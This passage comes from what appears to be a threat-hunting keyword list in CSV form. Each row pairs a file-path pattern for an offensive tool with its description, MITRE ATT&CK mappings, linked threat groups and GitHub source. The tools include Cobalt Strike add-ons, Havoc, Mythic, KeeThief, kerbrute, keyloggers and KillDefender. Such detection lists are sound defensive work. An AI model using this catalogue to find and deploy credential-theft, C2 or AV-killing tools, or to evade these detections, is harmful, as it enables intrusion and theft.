pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/juicypotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/JuicyPotatoNG.git*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*/Jump-exec/Psexec*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/K8_CS_*_*.rar*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*/k8gege/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/k8gege/scrun/*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*/k8gege520*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/ka7ana/CVE*.ps1*","offensive_tool_keyword","poc","Simple PoC in PowerShell for CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/ka7ana/CVE-2023-23397","1","1","N/A","N/A","1","36","11","2023-03-16T19:29:49Z","2023-03-16T19:10:37Z" +"*/kali/pool/main/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/kali-linux-2023*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/kali-tools-*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/katoolin3*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*/kdstab.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*/KDStab.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*/KDStab/*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*/keepass_discover.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/keepass_discover_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/keepass_trigger.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/KeeThief.git*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10",,"N/A",,, +"*/kerberoast.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast.c*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/kerberoast.c*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*/kerberoast.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/kerberoast.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/kerberos-ldap-password-hunter*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","189","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" +"*/kerberosticket.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/kerbrute/*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*/KernelMii.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*/keygen.exe*","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/keylogger.cpp*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*/KeyLogger.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/keylogger.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*/keylogger/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/keyscan.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/killav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/killav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/KillDefenderBOF*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*/kimi.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/kismet*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","N/A","N/A","10","1299","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" +"*/kismetwireless/*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","10","1299","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" +"*/kitrap0d.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/kittens/haloKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/kittens/recycleKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" 